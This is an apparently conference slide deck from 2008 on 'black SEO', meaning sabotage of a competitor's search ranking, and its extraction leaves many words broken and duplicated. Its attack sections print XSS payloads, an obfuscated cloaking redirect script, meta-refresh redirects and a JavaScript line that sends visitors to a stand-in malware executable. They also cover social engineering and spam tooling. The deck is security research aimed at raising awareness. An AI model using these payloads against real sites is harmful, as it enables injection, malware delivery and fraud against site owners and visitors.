Black SEO Exposed - Security Assessment

Transcription

Black SEO Exposed
Presented By Roberto Suggi Liverani
© 2008 Security-Assessment.com
About me
Roberto Suggi Liverani
Security Consultant - Security-Assessment.com
http://www.security-assessment.com
h
//
CISSP
Web App Pen Tester
OWASP New Zealand Founder/Leader -
htt //
http://www.owasp.org/index.php/New_Zealand
/i d
h /N
Z l d
Personal Site: http://malerisch.net
Agenda
Introduction
SEO (Search Engine Optimisation) – concepts, definitions
Black
l k SEO – definition,
d f
security implications
l
Black SEO Exposed:
Methodology – the big plan
Reconnaissance – information gathering is the key
Target Resources Elimination – indirect attack techniques
Frontal attack – direct attack techniques
Collateral damage – other attack techniques
Tools – weapons
p
of SEO destruction
Recommendations
Case Study: personalsoftwarefinance.com – the target!
Introduction
SEO – Search Engine Optimisation
Search engine optimization (SEO) is the process of improving the
volume and quality of traffic to a web site from search engines via
"natural" ("organic" or "algorithmic") search results for targeted
keywords.
TOP 10 search engines results page (SERP) = SEO industry
Some SEO terms: positioning, ranking, keywords
SEO Hats:
White Hat SEO: web promotion techniques following search
engine guidelines
Black Hat SEO: web promotion techniques not following any
guidelines
Black SEO - Definition
Black SEO (or Negative SEO): sabotage techniques aiming to
reduce a web site's ranking in search engine results
Black SEO Security Concept Map
Security Implications 1/2
The common perception towards black SEO:
Google: “There's almost nothing a competitor can do to harm
your ranking or have your site removed from our index”
index
General Assumption: “Black SEO is only related to SEO”
Black SEO and Security:
IT Security still does not include this category of attacks
Most
M t IT Security
S
it literature
lit t
does
d
nott even mention
ti the
th SEO tterm
The potential:
Black SEO attacks do not always involve exploitation of target
vulnerabilities
50% of the OWASP Top 10 can be used to leverage black SEO
attacks
Knowledge gap between SEO hackers and WEB hackers is
reducing - Latest web spam techniques exploit XSS
Security Implications 2/2
Black SEO security considerations:
Three elements in the security equation:
Attacker
k
Search engine
Target site
Search engine is the unknown variable in the security equation
Black SEO attacks:
Search engines process the attack
Attack results are not direct (might be visible after 3 days, 1
week, 1 month or might not be processed)
Attacker needs to monitor continuously attack results
Target needs to realise if under attack
Methodology
If you know the enemy and know yourself, you need not fear the result
of a hundred battles. If you know yourself but not the enemy, for
eevery
e y victory
cto y ga
gained
ed you will also
a so suffer
su e a defeat.
de eat If you know
o
neither the enemy nor yourself, you will succumb in every battle.
- Sun Tzu
Methodology
Black SEO methodology:
Target Reconnaissance
Target Resources Elimination
l
Frontal Attack
Collateral Damage
The weapons:
Search Engines, Hacking Tools, Black Hat SEO techniques, Spam
Tools
What does black SEO attack?
Home/Landing Page - www.targetsite.com
Specific web page - www.targetsite.com/product/xyz.htm
Reconnaissance
http://www.flickr.com/photos/kden604/203323823/
Reconaissance
Build target backlinks/neighbors map.
map Include:
Key (authoritative) target resources with high Page Rank
Direct incoming links
l k to target
2nd/3rd Level incoming links to target
Outcoming target links
Approach target as complex structure with relationships:
Business Target
Political Target
The parent company
Political Party
Subsidiary companies
Political Election/Campaign
Sister companies
Political Affiliates
Significant business
partners
Supporting Politicians
Brands/Divisions
Supporters
Reconnaissance - Tools
Extrapolate target links from search engines:
Google
site:targetsite.com – indexed
d
d pages off target site
link:targetsite.com – pages that link to target site
cache:targetsite.com – current cache of target site
info:targetsite.com – information on target site
related:targetsite.com – pages similar to target site
targetsite.com -> enter full URL into the search fields (+ all
subdomains combinations)
Google News, Google Groups and Google Alerts
Yahoo: Site Explorer - http://siteexplorer.search.yahoo.com/
http://targetsite.com – includes pages indexed and pages that
li k to
link
t target
t
t site
it
Reconaissance - Tools
Live Search Macros http://search.live.com/macros/default.aspx?FORM=BJJK
Create an advanced search Macro on target site/web page
Other tools:
web.archive.org
web archive org – useful to identify content linked in the past
Maltego: excellent tool to display structure of any entity on the
internet.
te et http://www.paterva.com/web2/Maltego/maltego.html
ttp //
pate a co / eb / a tego/ a tego t
http://www.scrutinizethis.com/
http://www.abouturl.com/index.php
http://www abouturl com/index php
http://whois.domaintools.com
http://netcraft.net
http://netcraft net
http://www.webmaster-toolkit.com/
http://www.myipneighbors.com/
htt //
i
i hb
/
Reconaissance - SEO Tools
Extrapolate target SEO data:
Firefox add-on: Seoquake (https://addons.mozilla.org/enUS/firefox/addon/3036)
Identify target SEO skills,
skills keywords and SERP positioning:
Check if target uses Google Web Master and/or Yahoo Site
Explorer
po e
Check if target is practicing any SEO techniques
Scan target with SEO software
Webceo - http://www.webceo.com
Check target
g backlinks
http://www.linkhounds.com/link-harvester/backlinks.php
Eliminating target resources
The neighbours target map (visual concept):
Thinking like a search engine:
A link to a ppage
g = casting
g a vote
Votes are related to a specific content/information
Many votes to a site indicate that the site is “authoritative”
authoritative /
“trusted” for a specific content = best value to user
Eliminating target resources:
Remove/divert links from authoritative/trusted sites to target site
Remove/divert
/d
direct
d
and
d indirect
d
incoming links
l k to target site
Two main attack approaches:
Hack neighbours sites and remove links
Social engineering + direct attack
First approach not always feasible. Second approach:
Impersonate target and social engineer target resources
Motives to remove/divert link: rebranding, restructuring,
maintenance, new domain, spam links, etc.
Enforce case with new domain registered as target, XSS/SQL
injection, spam links, etc.
A possible attack scenario:
Impact:
p
Decreased quality/quantity of target neighbours
Target position and rank affected
Frontal attacks
Frontal Attacks Table
Frontal attacks classification
Scope
Exploit
Complexity
Probability
of success
Attack
Timeframe
Decrease:
• rank
• position
• backlinks
Low/Medium
High/Medium Long
• Reversing search
engines
• Web Spam as a
proof
• Crawling
• Indexing
• Caching
Demonstrate:
target is:
• deceitful
• fraudulent
• spamming
p
g
High
Low/Medium
Medium
• Target vulnerable
• Low
quality/quantity
target backlinks
• Moderate/Absent
target SEO skills
• Human review of
spam reports
• Tools speed
indexing
(quantity/quality)
Impact
Position/Rank
decreased
Target
ban/penalisation
The two scopes
p and the techniques
q
involved have completely
p
y
opposite results
Attacker makes a choice depending on: available timeframe,
resources, skills
kill and
d target
t
t exploitability
l it bilit
Decreasing target positioning
Attack: Spam social bookmarks with target URL
Digg.com, Reddit.com, Onlywire.com, etc
Automatic script + sociall bookmarks
b k
k API
http://www.onlywire.com/api/add?url=http://targetsite&ti
tle=targetsite&comments=targetsite&tags=targetsite
Impact: Target can be banned. Target site loses links from
trusted/high PR domains
Attack: Duplicate target content in:
target site (exploit stored XSS or SQL injection)
domain with higher PR of target site (buy another site)
many sites (build network of clones)
Impact: Target penalised for duplicate content
Attack: Submit web proxy + target site to search engines
Use proxy with a higher PR and/or higher number of backlinks
than target
Use proxy that do not obfuscate target URL
http://www.zzoop.com/index.php?=&=http://targetsite/
http://www.zzoop.com/index.php?
& http://targetsite/
Impact: target position may drop suddenly
Attack: Mass submissions of target to low quality web directories
Most of them are free. Low quality = n/a or PR 0
Publication can take up to 6 months. Do mass submission.
http://www.web-directories.ws
Impact: Decrease quality of neighbours. Position decreased.
Attack: Create backlinks to unused target subdomain
www.targetsite.com – 200 OK (used/promoted)
targetsite.com – 200 OK (not
(
used)
d) <- backlinks
b kl k target
No 301 redirection and both subdomains must point to same
content
Impact: Positioning affected
Attack: DoS target
Spider needs a 404 Not Found response from target
Then request removal of unavailable target pages
Impact: Target page removed from SERPS
Attack: Promote target site URL + dynamic content such as:
Session IDs
Variables
bl with
h long
l
values
l
http://targetsite/?PHPSESSIONID=a8s7d8782378273827381273821s98d&productId=a9
982938219038291832918391389218931&a2=9sa8d9as7d9a7d98sa7d8sa7d8asdsa&b2=1203
18291289381938921&login=true
Impact: positioning decreasing, pages removal or no pages caching
Attack: Promote competition of target using White Hat SEO
competition
target
competition
Impact: positioning decreased
Attack: Build fake content based on target keywords
Turn everything from the target keywords into education
content which provides real value to end user
Promote fake content with black hat/white hat SEO techniques
Fake
Legitimate
Fake
Legitimate
Fake
Legitimate
Legitimate
Impact: positioning shift
Target perceived as spammer
Alonzo: [after killing Roger and shooting Jeff] It's not what you know,
it's what you can prove.
Training Day, 2001
Attack: Inject permanent links pointing to bad sites into target
<a href=http://badsite>target site keywords</a>
<a href=http://badsite>spam keywords</a>
Exploit
l stored
d XSS, SQL injection in target
Injection must be stealth, deceitful, smart, balanced
Attack should last as long as possible
If possible, make cross links between target and bad sites
Impact: Penalisation and/or ban of target site
Bad site can contain:
Spam
Porn
Malicious Content (malware, virus, trojan/backdoor)
Warez/Cracks/Torrents/File Sharing Links/Illegal Files
Links to other bad sites
Bad site can be:
PayPerClick Page/Blog/Fake Directory/Fake Forum/Scraped Page
Bannedd
Phishing
Thin Affiliate
Free link Exchange
Bad site can use:
JavaScript Redirects - JavaScript used for cloaking
Keyword Stuffing - overloaded page with excessive keywords
Backdoor ppages
g –p
page
g that hides backdoor (+
( redirection))
100% Frame – frameset with one frame 100% to deceive search
engines spiders
Hidden text/Hidden Links – hidden content with intention to
deceive search engines
Foreign Language – foreign language with intention to confuse
search engines
Sneaky Redirects – redirection through rotating domains
Same class C IP addresses and same domain registrant details of
target site
Attack: Promote target XSS link
http://targetsite.com?search=a”><a href=http://badsite>target site keywords</a><!—
http://targetsite.com?search=a”><iframe src=\\badsite></iframe><!—
http://targesite.com?frameurl=http://badsite
p
g
p
http://targetsite.com?redirect=http://badsite
Links must point to bad sites
Promote XSS link + target keyword with black-hat SEO
Use link farms, splogs, guest books, forums, any article/page
th t enable
that
bl comments
t with
ith good
d PR
Target site needs to appear in top 10 SERP for the keyword
promoted
If attack is successful, report target to search engines with
search URL,, keyword
y
and target
g URL
Impact: Penalisation and/or ban of target
Attack: Inject cloaking JavaScript into target site
<script language="JavaScript"> var
r=document.referrer,t="",q;if(r.indexOf("google.")!=1)t="q";if(r.indexOf("msn.")!=-1)t="q";if(r.indexOf("live.")!=1)t="q";if(r.indexOf("yahoo.")!=-1)t="p";if(r.indexOf("altavista.")!=1)t="q";if(r.indexOf("aol.")!=-1)t="query";if(r.indexOf("ask.")!=1)t="q";if(document.cookie.length==0 && t.length &&
(document.URL.indexOf("?cloakhook=")!=-1 && ((q=r.indexOf("?"+t+"="))!=1||(q=r.indexOf("&"+t+"="))!=-1)){window.location="http://badsite/";}</script>
1||(q
r.indexOf( & +t+
))! 1)){window.location http://badsite/ ;}</script>
Cloaking must point to bad sites
Promote cloaking hook with black-hat SEO
<a href=http://targetsite.com/?cloakhook=10>any keyword</a>
If attack is successful, report target to search engines
Impact:
p
Penalisation and/or
/ ban of target
g
Attack: Inject redirection into target
HTML meta tag refresh with a very short time
JavaScript triggering redirection
d
onmouseover event
<META http-equiv="refresh" content=“0;URL=http://badsite/buyviagra.php">
<body onmouseover=“document.location(‘//badsite/buyviagra.php’)>
Impact: Penalisation and/or ban of target
Attack: Splog target
Use spam script/tool that leaves target URL in thousands of blog
comments and forums
Create large number of blogs spamming target and using
syndicated services such as RSS to be used in blog pings
http://pingomatic.com/
Impact:
I
t ban/penalisation
b /
li ti
Attack: Exploit XSS vulnerability in trusted sites to promote target
Create link farm to index XSS link to target site
Xssed.com
d
lists
l
vulnerable
l
bl sites with
h high
h h PR
<a href=‘http://www.imdb.com/List?locations="><iframe src=//targetsite.com>
</iframe>’>keyword to be ranked</a>
<a href =‘http://help.yahoo.com/bin/help/redirect.cgi?to_url=
http://targetsite.com’>keyword to be ranked</a>
Attack: Spam target in universities pages, forums, sites with high PR
Some EDU pages are available at low price
Use target name in the account name (reflected in URL)
<a
<a
<a
<a
<a
href=‘http://groups.google.com/group/targetsite’>keyword</a>
href=‘http://www.bebo.com/targetsite’>keyword</a>
h
f ‘htt //
b b
/t
t it ’ k
d /
href=‘http://www.mixx.com/users/targetsite’>keyword</a>
href=‘http://infostore.org/user/targetsite’>keyword</a>
href=‘http://cgi.cse.unsw.edu.au/~targetsite/targetsite.html’>keyword</a>
Impact: Target ban
Attack: Store copyrighted material into target site
Material pertinent to target from copyrighted sources (books,
encyclopaedias white papers
encyclopaedias,
papers, etc
etc.))
Issue DMCA complaint if target is US based to search engines
and to target ISP
Impact: target site page temporary removal (legal case)
Attack:
ttac Spa
Spam ta
target
get ssite
te in spa
spam page
Use comments in spam page illegally ranking in top 10 SERPS
Exploit XSS,
XSS SQL injection or any injection
Report both spammer and target to search engines
Impact:
ban
I
t target
t
tb
Attack: Buy paid links on behalf of target
Paid links marketplaces:
www tnx net - www.isellpagerank.com
www.tnx.net
www isellpagerank com
Inject links identified as “paid links” into target
Attack: Show target is selling paid-links
paid links
Target site must have a good PR (at least 3 or 4)
Sell
S ll links
li k on target
t
t behalf
b h lf through
th
h link
li k marketplaces
k t l
Inject links on sale through stored XSS or SQL injection
Attack: Trade links on behalf of target
Impersonate target to send emails for link trading
Inject links through XSS, SQL injection or any injection
In all cases, report target to search engines
Impact: target site removal/penalisation
Collateral Damage
http://www.flickr.com/photos/mongol/447087265/
Collateral Damage
Collateral damage: damage in terms of web marketing context,
context
reputation/image
Attack: 302 hijacking target
Well known Google bug (not completely fixed)
Point many 302 redirections to target site
Implement cloaking on landing page
Target
Target
hijacked
Impact: target site content displacement
Collateral Damage
Attack: Create a malware connection with target
Malware hosted on target site or on a third party site
Inject JavaScript which
h h launches
l
h malware
l
<img src=a.gif
onload=javascript:document.location.href='http://malwaresite/malware.exe'; />
Report target site to: Stopbadware.org - McAfee Site Advisor –
AVG Link Scanner
Impact:
I
t Target
T
t Sit
Site P
Public
bli Image
I
Attack: Google bombing/bowling target site with negative keywords
Still works on Google, Yahoo and Live
Pickup a non-common / negative-impact keyword
Promote target site link with negative keyword in good quality
link farm
<a href=‘http://targetsite’>bad keyword</a>
Impact:
I
t target
t
t reputation
t ti and
d iimage
Collateral Damage
Attack: Expose target sensitive pages to SERPS
Example: hidden directories, awstats, webalyzer, admin, URL
with username/password,
username/password etc
Google Dorks from GHDB http://johnny.ihackstuff.com/ghdb.php
Make target link indexed by search engines
Impact: exposure of statistics and sensitive data useful to
co pet t o
competition
Weapons of SEO Destruction
Xrumer – http://www.botmaster.net/more1/
http://www botmaster net/more1/
Autosubmitter
Large database
d b
off forums,
f
groups pages available
l bl
Advanced control on threads and posts
Captcha and pictocode support
ProxyURL – http://www.esrun.co.uk/blog/proxy-url-creator/
Generates large list of proxy urls
Sed (Search Engine De-optimisation) ** JUST RELEASED **
http://malerisch.net/tools/negativeseo/sed.zip
Page generator with hidden text technique, target keyword
stuffing in meta tags,
tags title tags and other HTML elements
Associate phishing sites URLs from Safebrowsing to target
Associate
A
i t random
d
spam keywords
k
d to
t target
t
t
Recommendations
Security Recommendations:
Secure the site - OWASP Testing Guide
Subscribe
b b to Google
l Webmaster
b
Tooll and
d Yahoo
h Site Explorer
l
Check incoming and outcoming links periodically
Set Google Alert
Check/monitor web server logs constantly
Disable 302 temporary redirection if used
Do not use redirection functions
Check periodically web server directory and application source
code for changes/presence of backdoors
Case Study
Personalsoftwarefinance.com
Personalsoftwarefinance com – fake company selling fake software
Experiment environment factors:
Major Searchh Engines involved
l d (Google,
(
l Yahoo)
h )
Primary keywords: personal software finance
Domain name: personalsoftwarefinance.com
ICANN Registrar: Godaddy.com
Reputable Web Hosting: successfullhosting.com
SEO Tools used: Web Seo + common SEO techniques from
articles, books, etc
Web stats tools: awstats, webalizer, hsphere panel tools
Site is vulnerable common web vulnerabilities such as stored
XSS, SQL injections, XSRF
Case Study
Time for the video!!!
Conclusions
And remember
remember...
Q: What can I do if I'm afraid my competitor is harming my
ranking in Google?
Google: There's almost nothing a competitor can do to harm your
ranking or have your site removed from our index. If you're
concerned about another site linking to yours, we suggest
contacting the webmaster of the site in question. Google aggregates
and
a
d organizes
o ga es information
o at o pub
published
s ed o
on tthe
e web;
eb; we
e do
don'tt co
control
to
the content of these pages.
Thanks!
http://www.security-assessment.com
http://www.security
assessment.com
Roberto Suggi Liverani
[email protected]
References/Links
Negative SEO articles

Black - Negative SEO Hits Mainstream Media

Companies Offer to Damage Your Competitors Search Engine Rankings

Companies
p
subvert search results to squelch
q
criticism

Condemned To Google Hell - Forbes.com

'Google bowling' and negative SEO All fair in love and war Searchlight - An SEO blog by Stephan Spencer - CNET Blogs

Firms use evil SEO to kill rivals' Google rankings : News : Security - ZDNet Asia

Google allowing other webmasters to damage your site

Google-Proof PR - Forbes.com

In Pictures 7 Ways Your Site Can Be Sabotaged - Forbes.com

Having Fun at Donalds Expense - So How's this Happening? | Threadwatch.org

Google's Matt Cutts' Blog GoogleWashed | Threadwatch.org

Give me money or I will drop your Google Rank - Search Engine Watch Forums

Fighting Off Negative Publicity and Affiliates in the SERPs : SEO Book.com

Google Keeps Tweaking Its Search Engine - New York Times

Google Should Offer Self Defense Against Spammy Inbound Links

Google's Cookie

Michael Sutton's Blog : A Tour of the Google Blacklist

Matt Cutts Google
g bowling
g exists Threadwatch.org
g

Kick Your Competitor With Negative SEO? - Google Blogoscoped Forum

Negative SEO - Harming Your Competitors With SEO Negative SEO (Black SEO) Tactics - Fighting Dirty

Negative SEO At Work: Buying Cheap Viagra From Google’s Very Own Matt Cutts - Unless You Prefer Reddit? Or Topix? ::

My First Million on the Internet: Google Bowling and Negative SEO: Tearing Down Rather Than Building Up

SEOmoz | Del.icio.us Cloaking to Combat Spam
References/Links
Negative SEO articles

SEOmoz | The Dark Side of Wikipedia

The Saboteurs Of Search - Forbes.com

SEOmoz SEO isn�t hacking
g - and data securityy tips
p

SEO poisoning attacks growing

Google Penalization: Text Links, Redirects Not Likely Causes - Spam Comment Links Maybe - The Story Continues - Robin Good's
Latest News

Other sites can hurt your ranking | JLH Design Blog

Building Authority Websites The Right Way | Denver SEO Guy | Knox in Denver

How Much Money is a Top Google Ranking Worth to Your Business?

Google allowing other webmasters to damage your ranking

Why should I report paid links to Google?
Forums/Blogs

Black Hat SEO Black Hat Forum - Powered by vBulletin

Bl kh t SEO
Blackhat

BlackHatCrew - Elite Webmaster SEO Forum

Blackhat SEO » Blog Archive » Free blog hosts Digerati Marketing - The better search blog

Earl Grey`s Black Hat SEO Forum and SEOBlackhat SEM Community - The first and leading Resource on Blackhat SE0
Happar com Support Forum / Register
Happar.com

Evaluating Google Search Quality | Bruce Cat dot com evilgreenmonkey

Google Search News

Matt Cutts Gadgets, Google, and SEO IncrediBILL's Random Rants

Half’s SEO Notebook
References/Links
Forums/Blogs:

IrishWonder’s SEO Consulting Blog

Negative SEO blog SEOassassin

Network Securityy Research and AI ø Blue Hat SEO-Advanced SEO Tactics ø

SEO Black Hat Forum

SEO Black Hat SEO Blog

SEO Chicks |The SEO Blog with attitude

roguespammer: A Rogue Spammer

Search Engine Cloaking and Optimization Forum - SeoJeans / Hot Topics

Stefan Juhl » Internet marketing, SEO & online media monetization Welcome to Seocracy.com

Search Engine Marketing Tips & Search Engine News - Search Engine Watch

SEO Forum
Negative/Positive SEO Techniques:

302 Google Jacking - Has your page been hijacked - Home "Filler Friday: Google Bombing" from Über - Better than you, daily!»
H
How
D
Do Th
The D
Duplicate
li t C
Content
t t Filt
Filters Work?
W k?

8 ways to abuse your XSS vulnerabilities - stefanjuhl.com

Better search engine ranking Google ranking tips from a Google employee

Better search engine rankings The risk of over-optimization How to remove your competitors from MSN Live!

Hijack A Domain For 200$ at Conceptualist.com, By Sahar Sarid Funny Google's Cache Error

Google and the Mysterious Case of the 1969 Pagejackers || kuro5hin.org

Google Proxy Hacking: How A Third Party Can Remove Your Site From Google SERPs

Link schemes

http://tech.propeller.com/viewstory/2006/07/22/google-has-a-6-month-penalty-for-using-expired-domain/

Improve search engine rankings
References/Links
Negative/Positive SEO techniques:

Improve search engine rankings Insider information about Google's ranking algorithm Own-the.net (Webappsec, SEO, and
general Web Dev)

SEOmoz | XSS - How to get 20 .gov links in 20 minutes

Using Canonical Domains to Sabotage Competitors in Google Threadwatch.org

Stop 302 Redirects and Scrapers from Hijacking Web Page PR - Page Rank

SpewMoney™ » Blog Archive » Getting traffic from Facebook or How her milkshake brings all the boys to my website SitePoint
Blogs » example.com vs. www.example.com… trouble!

Google Proxy Hacking: How A Third Party Can Remove Your Site From Google SERPs

The Dark Side of Search Engine Optimization - Organic SEO Wiki

Official Google Webmaster Central Blog: The Impact of User Feedback, Part 1
SEO ttools/software:
l / ft

Blackhat SEO - Esrun » Blackhat SEO Scripts

Black Hat SEO Software Built to Make Money Fast - Black Hat Software

Blackhat SEO - Esrun » GMAIL Account Creator [GAC] Dark SEO Programming

Dark SEO Programming » captcha

Dark Seo Team

dnScoop - Domain Name Value, History, Stats Tool and Forums

Free URL Redirection
Redirection, No Ads! Short Free Domain Name (you
(you.co.nr)
co nr)

Google Remove URL - One for the Good Guys! » SEO Image Blog: Stardate
http://sb.google.com/safebrowsing/update?version=goog-black-url:1:1

Free Web Analytic, Search Engine, Page Rank and SEO Optimization Tools - Are you GoingUp?